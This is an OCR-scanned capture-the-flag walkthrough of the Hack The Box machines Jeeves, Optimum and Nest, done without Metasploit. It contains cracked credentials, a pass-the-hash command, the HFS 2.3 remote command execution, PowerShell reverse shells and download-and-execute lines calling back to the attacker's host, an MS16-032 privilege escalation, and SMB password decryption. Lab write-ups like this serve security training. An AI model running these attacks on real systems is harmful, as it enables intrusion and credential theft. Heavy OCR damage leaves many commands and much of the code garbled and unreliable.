1/1 (løø.øø%)
Guess .Queue......
Speed
Recovered........
Progress..........
Rejected...
Restore.point....:
Restore. Sub .#1...:
Candidates .#1....
Started: Thu May
Stopped: Thu May
. .47db48
1760 H/s (12.21ms) Accel:512 Loops:64 Thr:l vec:8
1/1 (løø.øø%) Digests, 1/1 (løø.øø%) Salts
55296/14344385 (0.39%)
0/55296 (ø.øø%)
53248/14344385 (0.37%)
Salt:Ø Amplifier: 0-1 Iteration: 5952-6000
soydivina
28
28
grad2ø1ø
2020
2020

So we found that the password for the file is moonshine1

Looking through everything in the kdbx file, we find:

CEH.kdbx [read-only]
Groups View Tools Help
- KeePassX
Database Entries
CEH
General
Windows
Network
Internet
a eMai1
Homebanking
Backup stuff
Bankof America
p DC Recovery PW
P EC-Counci1
It's a secret
Jenkins admin
Keys to the king...
Walmart.com
Username
Michae1321
administrator
hackerman123
admin
admin
bob
anonymous
URL
https://www.bankofamerica.com
https://www.eccouncil.org/progra...
http://localhost:8180/secret.jsp
http://localhost:8080
http://www.walmart.com

Taking note of all our credentials found

backups tuff : aad3b435b51404eeaad3b435b51404ee : eØfb1 fb85756c24235ff238cbe81 feøø
Michae1321: 12345
administrator : SITjAtJHKsugh90C4VZ1
hackerman123 : pwndyouall !
admin : F7WhTrSFDKB6sxHU1 cun
b0b: ICEUnYPjNf1uPZSzOySA
anonymous : password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that first line is a hash, so I attempted to pass the hash… and returned a system shell

kaliö)hyd3 . •-/Documents/htb/ jeeves/smb$ pth-winexe -U administrator%aad3b435b51W4eeaad3b435b514
04ee: eøfb1fb85756c24235ff238cbe81feøø // 10.10.10.63 cmd . exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved .
C: \Windows
whoami
jeeves\administrator
C: \Windows
hostname
Jeeves

Grabbing the user and root flags:

C: Administrator
cd Administrator
C: Desktop
cd Desktop
C: \Users
dir
Volume in drive C has no label.
Volume Serial Number is BE5ø-BIC9
Directory
11/08/2017
11/08/2017
12/24/2017
11/08/2017
of C:
10:05 AM
10:05 AM
03:51 AM
10:05 AM
2 File(s)
2 Dir(s)
36 hm. txt
797 Windows 10 Update Assistant.lnk
833 bytes
7 bytes free
C: \Users
cd
'cd' is not recognized as an internal or external comand,
operable program or batch file.
C: hm. txt
type hm.txt
The flag is elsewhere.
Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:

Optimum – No Metasploit

Lets power up nmap and see what we find:

PORT STATE SERVICE REASON
VERSION
8Ø/tcp open http
syn-ack ttI 127 HttpFiIeServer httpd 2.3
l_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
I http-methods:
I _ Supported Methods: GET HEAD POST
_http-server-header: HFS 2.3
l_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 20121712008120161vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2ø12 cpe:/o:microsoft:windows_7: cpe:/o:microsoft:windows_server_2øø8:r2 cpe:/o:microsoft:windows_8 cpe:/o:micr
t:windows vista: :- cpe: :spl
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Mic
osoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SPI or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or
or Windows Server 2008 SP2 or 2008 R2 SPI (85%), Microsoft Windows Vista SPO or SPI, Windows Server 2008 SPI, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
686-pc-linux-gnu)
OPS(OI

Okay. Let’s go to 10.10.10.8

@ 10.10.10.8
Most Visited Offensive Security Kali Tools •S
Exploit-DB OS
user
Login
No files in this folder
D
Folder
O folders, O files, O bytes
-72090 Student co...
Offensive Security For...
Q Search
Inbox - adeebhshah@g...
Finding Bad Character...
Search
Select
go
Invert
Mask
O items selected
Actions
Archive
Get list
Server information
HttpFileServer2.3
sep.'er time: 3/6/2020
Server uptime: 10:37:37

Look at the bottom left. We get HttpFileServer 2.3

Let’s poke around on SearchSploit:

searchsploit hfs
Exploit Title
TRUNCATE Denial of Ser
Apple Mac OSX 10.4.8 - NIG kFS+ DO _
LRFS FileSystem (Denial of Service)
Apple Mac OSX 10.6 -
Subsystem Information Disclosure
Apple Mac OSX 10.6.x - BFS
Apple Mac OSX xnu 1228. x - 'hCs-fcntI' Kernel Privilege Escal
FHES - FTP/HTTP File Server 2.1.2 Remote Command Execution
Linux Kernel
Double-Free Denial of Service
2 6 x SquashF
Rejetto
Rejetto
Rejetto
Rejetto
Rejetto
Rejetto
HTTP
HTTP
HTTP
HTTP
HTTP
HTTP
File
File
File
File
File
File
Server
Server
Server
Server
Server
Server
(kFS)
Remote Command Execution (Me
1.5/2. x - Multiple Vulnerabili
2.2/2.3 - Arbitrary File Uploa
2.3.x - Remote Command Executi
2.3.x - Remote Command Executi
2.3a/2.3b/2.3c -
Remote Comman
Path
(/usr/share/exploi tdb/)
exploi ts/osx/dos/29454. txt
exploits/osx/dos/12375. c
exploi ts/osx/IocaI/35488. c
exploits/osx/IocaI/8266. txt
exploi ts (windows / remote/ 37985 . py
exploits/Iinux/dos/28895. txt
expl oi ts/windows / remote/ 34926. rb
exploi ts/windows/remote/31Ø56. py
exploits/mu1tip1e/remote/3Ø850. txt
exploi ts (windows / remote/ 34668. txt
exploi ts/windows/remote/39161. py
expl oi ts/windows /webapps/34852. txt

RCE always looks fun. Let’s look at that one… specifically the .txt file:

issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string;
begin result:
, ofs) end;
it will not handle null byte so a request to
http://localhost : . exec I cmd . }
will stop regex from parse macro ,
and macro will be executed and remote code injection happen .
EDB Note: This vulnerability will run the payload multiple times simultaneously.
Make sure to take this into consideration when crafting your payload (and/or listener).

So basically we need to apply a null byte and then {.exec|cmd.} where cmd is whatever command we want. Let’s use burp to try this out. It took me a while to figure this out and I actually had to watch Ippsec’s video but in it he explains the importance of SysNative vs. SysWow64 vs System32.

And in our icmp dump we get:

20:58:30. 657617
657649
703055
703087
706503
706526
707674
20:58:30. 707698
. 674435
. 674469
•58:31.721354
721401
20:58:31. 721416
20:58:31. 721419
20:58:31. 721496
20:58:31. 721501
690808
20:58:32. 690842
20:58:32. 736639
20:58:32. 736673
20:58:32. 736686
20:58:32. 736688
20:58:32. 736694
20:58:32. 736696
20:58:33. 706481
20:58:33. 706515
752505
20:58:33. 752539
20:58:33. 752550
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8 >
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8 >
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10.10.8
hyd3:
hyd3 > 10.10.10.8:
10.10. 10.8
hyd3:
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
ICMP
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
echo
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
reply, id 1,
request, id
1, seq 37, length
seq 37, length
1, seq 38, length
seq 38, length
1, seq 39, length
seq 39, length
1, seq length
seq length
1, seq 41, length
seq 41, length
1, seq 42, length
seq 42, length
1, seq 43, length
seq 43, length
1, seq length
seq length
1, seq 45, length
seq 45, length
1, seq 46, length
seq 46, length
1, seq 47, length
seq 47, length
1, seq 48, length
seq 48, length
1, seq 49, length
seq 49, length
1, seq 50, length
seq 50, length
1, seq 51, length

So we have command execution! Now, let’s copy Invoke-PowerShellTCP.ps1 to working our directory and append the file with the example in the PS1 script

$client .C10se()
if ($listener)
$1istener .stop( )
catch
Write-warning
rrect port."
Write-Error $_
"Something went wrong! Check if the server is reachable and you are using the co
Invoke-PowerShe11Tcp -Reverse
-IPAddress 10.10.14.30
-Port

Serve it up on our box:

- [27/May/2Ø2Ø
110.10.10.8
.8 - - [27/May/2Ø2Ø
10.10. 10
"10.10.10
.8 - - [27/May/2Ø2Ø
.8 - - [27/May/2Ø2Ø
10.10.10
8 - - [27/May/2Ø2Ø
"10.10.10.
.8 - - [27/May/202ø
kaliö)hyd3 . "Documents/htb/optimum$ sudo python -m http.server 80
Serving HTTP on ø.ø.ø.ø port 80 (http•
.//ø.ø.ø.ø:80/) .
HTTP/I.I" 200
HTTP/I.I" 200
HTTP/I.I" 200
HTTP/I.I" 200
HTTP/I.I" 200
HTTP/I.I" 200
17:22:31]
17:22:31]
17:22:31]
17:22:32]
20:53:51]
20:53:51]
"GET
"GET
"GET
"GET
"GET
"GET
/ Invoke-PowerShe11Tcp. PSI
/ Invoke-PowerShe11Tcp. PSI
/ Invoke-PowerSheIITcp. PSI
/ Invoke-PowerShe11Tcp. PSI
/ Invoke-PowerShe11Tcp. PSI
/ Invoke-PowerSheIITcp. PSI

Now let’s supply the correct argument to burp and remember to URL encode it. Don’t forget to set up your listener.

On our listener, we get a user shell:

Ikaliö)hyd3 . "Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49282
Windows PowerSheII running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved .
PS C:

Looking around we get some creds that are pretty much useless at this point (but we keep enumerating anyway!)

DefaultDomainName
DefaultUserName
DefaultPassword
Alt DefaultDomainName
AltDefau1tUserName
AI tDefau1 tPassword
kostas
kdeEjDowkS*

At this point, I ran sherlock.ps1 to help me out a bit.

kaliö)hyd3 . —/Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49295
Windows PowerShe11 running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved .
PS http://1ø.1ø.14.3ø/winPEAS_64.exe -outfile winpeas64.exe
PS C: IEX(New-Object Net 'http://1ø.1ø.14.3ø/Sher10ck.ps1')
Title
MSBu11etin
CVEID
,Link
VulnStatus
Title
MSBu11etin
CVEID
Link
VulnStatus
Title
MSBu11etin
CVEID
Link
VulnStatus
Title
MSBu11etin
CVEID
'Link
VulnStatus
Title
MSBu11etin
•Link
VulnStatus
Title
MSBu11etin
CVEID
Link
VulnStatus
User Mode to Ring (KiTrapøD)
MS1ø-ø15
2010-0232
. https://www.exploit-db.com/exp10its/11199/
Not supported on 64-bit systems
Task Scheduler . XML
MS1ø-ø92
. 2010-3338, 2010-3888
. https://www.exploit-db.com/exp10its/1993ø/
Not Vulnerable
NTUserMessageCaII Win32k Kernel Pool Overflow
MS13-ø53
. 2013-1300
. https://www.exp10it-db.com/exp10its/33213/
Not supported on 64-bit systems
TrackPopupMenuEx Win32k NULL Page
MS13-ø81
. 2013-3881
. https://www.exp10it-db.com/exp10its/31576/
Not supported on 64-bit systems
TrackPopupMenu Win32k Null Pointer Dereference
MS14-ø58
. 2014-4113
. https://www.exploit-db.com/exp10its/351ø1/
Not Vulnerable
ClientCopyImage Win32k
MS15-ø51
. 2015-1701, 2015-2433
. https://www.exp10it-db.com/exp10its/37367/
Not Vulnerable

Hmm. At first I tried using an off-the-shelf MS16-032.ps1 script but they don’t work because they spawn a new terminal. We don’t have visual access so we can’t use it. Ippsec’s video shows us that there’s a copy in Empire that can be used on the CLI.

Testing it out:

PS C:
Invoke-MS16-ø32
[by b33f öFuzzySec]
Operating system core count: 2
Duplicating CreateProcessWithLogonW handle
Done, using thread handle: 2472
Sniffing out privileged impersonation token..
Thread belongs to: svchost
Thread suspended
Wiping current impersonation token
Building SYSTEM impersonation token
Success, open SYSTEM token handle: 2468
Resuming thread..
Sniffing out SYSTEM shell..
Duplicating SYSTEM token
Starting token race
Starting process race
Holy handle leak Batman, we have a SYSTEM shell! !
PS C: whoami
optimum\kostas

So we can use this modified MS16-032 that accepts commands.

To use this you have to edit the bottom to run the function that you want with the specified argument as the script states:

Return
$ca11Resu1t -
- [Kerne132] : : Terminateprocess($processlnfo.hprocess,
$Ca11Resu1t [Kerne132] :
$Ca11Resu1t [Kerne132] :
$StartTokenRace .stop( )
$SafeGuard .Stop( )
1)
Invoke-MS16032 -Command "iex(New-Object Net .WebC1ient) .DownIoadString( 'http://1Ø.1Ø.14.3Ø/rev4445.psQ' )"

Create another reverse tcp script with a different port (I called mine rev4445.ps1)

Running it:

PS C: Net .WebC1ient) .down10adString( 'http://1Ø.1Ø.14.3Ø/Invoke-MS
16032 .psl')
[by b33f
[!] Holy handle leak Batman,
PS C:
öFuzzySec]
we have a SYSTEM shell!!

And on our other listener that we set up on port 4445, we get a NT AUTHORITY\SYSTEM shell:

kalih)hvd3: "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.8/scans$ rlwrap nc
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49325
Windows PowerSheII running as user SYSTEM on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved .
PS C:
nt authority\system
PS C:
-nvlp 4445

Cache – No Metasploit

Sorry people… this is still active on HTB so I can’t publish the walk through just yet.

Nest – No Metasploit

Definitely learned a new thing or two with this box. Anyway, let’s fire off nmap:

Okay… so let’s go look at port 4386 to try to see what it is.

HQK Reporting Service? Erm. Ok. Port 445 was open so let’s run smbclient to list the shares and smbmap to list the contents:

kaliö)hyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ cat smbclient.txt
WARNING: The "syslog" option is deprecated
Sharename
ADMIN$
c$
Data
IPC$
Secure$
Users
Type
Disk
Disk
Disk
1 pc
Disk
Disk
Commen t
Remote Admin
Default share
Remote IPC

ADMIN$
c$
Data
dr--r--r
5 17
dr--r--r
7 15:07:51
7 15:07:51
7 15:07:51
7 15:07:33
7 15:07:33
7 15:07:33
7 15:07:32
•55:36
dr--r--r
dr--r--r--
•56: 02
Wed
Wed
Wed
Mon
Mon
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Wed
Sat
Sat
Fri
Sun
Thu
Thu
Wed
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Jan
Jan
Aug
Jan
Aug
Aug
Aug
25
25
26
8
8
7 18.
7 18.
7 18.
02 .
13.
7 18.
•53
•53.
13 : 29
• 02 .
: 46
• 46
• 41
: 44
•56
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2020
2020
2019
2020
2019
2019
2019
NO ACCESS
NO ACCESS
READ ONLY
IT
Production
Reports
Shared
Maintenance
Templates
Remote Admin
Default share
dr--r--r--
dr--r--r--
dr--r--r-
dr--r--r--
. \Data
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
fr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
dr--r--r--
fr--r--r--
IPC$
Secure$
Users
dr--r--r--
dr--r--r-
dr--r--r-
dr--r--r--
dr--r--r-
48
425
Maintenance Alerts. txt
HR
Marketing
Welcome Email . txt
NO ACCESS
NO ACCESS
READ ONLY
Administrator
C. Smi th
L. Frost
R. Thompson
TempUser
Remote IPC

What’s in Welcome Email.txt?

Cool. So we got a password. No… don’t go trying to use it just yet. Continue enumerating.

Looking at NotepadPlusPlus config.xml:

Looking at RU_config.xml:

… and that’s why we continue to enumerate FIRST.

Okay so, trying the creds that we’ve found so far… we figure out a couple things.

TempUser can get access with welcome2019

So can L.Frost!, but L.Frost can only login with welcome2019, not list shares for some reason (access denied)

Same with R.Thompson…

User: C.Smith and Password: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= can list contents in Secure$\IT\Carl\ directory with TempUser

kaliöhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.178/scans$ smbclient
-U TempUser
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\TempUser's password :
Try "help" to get a list of possible commands.
smb: recurse on
smb: Is
7 15
: 40: 13
7 15
: 42: 14
7 15
: 42
7 15
7 15
7 15
7 15
: 44: 16
Finance
HR
IT
\Finance
NT STATUS
NT STATUS
NT STATUS
ACCESS
ACCESS
ACCESS
DENIED
DENIED
DENIED
listing
listing
listing
smb: cd
smb: Is
Docs
Reports
VB Projects
\Docs
ip.txt
MC . txt
\Reports
56
73
Wed
Wed
Wed
Wed
Thu
Wed
Wed
Wed
Tue
Tue
Wed
Wed
Wed
Wed
Tue
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
8
6
6
6
09
10
7 15:43
09
06:59:25
: 45
: 41
: 45
: 40
: 55
: 42
: 40
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019
2019

With the encrypted password, RUScanner had vb files (Module1.vb) with an example of how to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/wscanner$ cat Modulel.vb
Module Modulel
Sub Main()
Dim Config As ConfigFiIe ConfigFi1e.LoadFromFiIe( "RU_Config.xm1")
Dim test As New Ssolntegration With {.Username Config. Username,
. Password
End Sub
End Module
Utils . Decryptstring(config.password)}

'kaliöhyd3 : "Documents/htb/nest/smb/secure/wscanner$ cat Ssolntegration .vb
Public Class Ssolntegration
Public Property Username As String
Public Property Password As String
End Class

kaliö)hyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat ConfigFiIe.vb
Public Class ConfigFi1e
Public Property Port As Integer
Public Property Username As String
Public Property Password As String
Public Sub SaveToFiIe(path As String)
Using File As New 10. FileStream(Path, 10. FileMode.Create)
Dim Writer As New XmI.SeriaIization
Writer .Seria1ize(Fi1e, Me)
End Using
End Sub
Public Shared Function LoadFromFi1e(ByVa1 FilePath As String) As ConfigFi1e
Using File As New 10.FiIeStream(Fi1ePath, 10.FiIeMode.Open)
Dim Reader As New Xml. Serialization
Return DirectCast(Reader. Deseria1ize(Fi1e), ConfigFi1e)
End Using
End Function
End Class

Utils.vb had the actual code to decrypt the password

kaliöhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ cat Utils . vb
"N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256)
Imports System. Text
Imports System. Security .Cryptography
Public Class Utils
Public Shared Function GetLogFi1epath() As String
Return 10. Path .Combine(Environment .CurrentDirectory ,
End Function
"Log. txt")
Public Shared Function Decryptstring(EncryptedString As String) As String
If String.IsNu110rEmpty(EncryptedString) Then
Return String. Empty
Else
Return Decrypt(EncryptedString,
End If
End Function
Public Shared Function Encryptstring(PIainString As String)
If String.IsNu110rEmpty(P1ainString) Then
As String
Return String. Empty
Else
Return Encrypt(PIainString,
End If
End Function
Public Shared Function Encrypt(ByVa1 plainText As String, _
ByVa1 passPhrase As String, _
ByVaI saltVa1ue As String, _
ByVaI passwordlterations As
BvVa1 initVector As String.
"N3st22", "88552299", 2, "464R5DFA5DL6LE28% 256)
Integer, _

So I needed a nudge on this because this is all REALLY out of my brain capacity (but wouldn’t be for long!)… this involved A LOT of trial and error:

Cutting and pasting the code on .net Fiddle (https://dotnetfiddle.net) and removing all the unnecessary (non encrypting related functions) and adding Imports System at the top (to get rid of the errors and import necessary classes/modules/etc to make the code work) and adding Console.WriteLine(plainText) before the decrypt function returns gave us this code:

That last portion was used to just decrypt the actual string that we found earlier. This returned the password:

Sub Yarn ( )
21m test As New Ssclntegratlcn Kith
End sub
End Class
s xRxRx
{ . Username =
"c. sm.1 th",
. Password
Utils . DecryptStr1ng (
Last Run: 10:00:46 pm

The password is: xRxRxPANCAK3SxRxRx

Using this, we can try to access the share with C.Smith’s username:

kalijhyd3 . —"Documents/htb/nest/smb/secure/RUScanner$ smbclient
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\c . smith's password:
Try "help" to get a list of possible commands.
-U c.smith
smb: recurse ON
smb: dir
Administrator
C. Smi th
L. Frost
R. Thompson
TempUser
\Administrator
NT_STATUS_ACCESS DENIED listing
XC. Smi th
HQK Reporting
user. txt
Sat
Sat
Fri
Sun
Thu
Thu
Wed
Sun
Sun
Thu
Thu
Jan
Jan
Aug
Jan
Aug
Aug
Aug
Jan
Jan
Aug
Aug
25
25
26
8
8
02 .
7 18:55
13 : 03 : 01
13 : 50
: 56
26
26
8
8
02
02 .
: 21
19:06:17
: 44
: 44
32
2020
2020
2019
2020
2019
2019
2019
2020
2020
2019
2019

We can then just download user.txt and read it:

smb :
smb :
type:
smb :
\ > cd C.Smith\
type user. txt
command not found
get user. txt /home/kaIi/Documents/htb/nest/user. txt
getting file of size 32 as /home/ka1i/Documents/htb/nest/user.txt (0.2 KiloBytes/
sec) (average 0.2 KiloBytes/sec)

Now onto root. Looking around, we see some interesting files in HQK Reporting

smb:
7 19
: 41: 16
dir
AD Integration Module
Debug Mode Password . txt
xmI
Reporting\AD
HqkLdap. exe
A
Module
249
Integration
Thu
Thu
Fri
Thu
Thu
Fri
Fri
Wed
Aug
Aug
Aug
Aug
Aug
Aug
Aug
Aug
8
8
8
8
9
9 08.
08.
9 08.
19:06:17
19:06:17
19:08:17
19 : 09 : 05
.18.
.18.
42
• 42
A
17408
2019
2019
2019
2019
2019
2019
2019
2019

HQK_Config_Backup.xml contents:

Looking a bit at Debug Mode Password.txt, it looks interesting. After looking for hours, I remembered about using alternate data streams to hide stuff in files.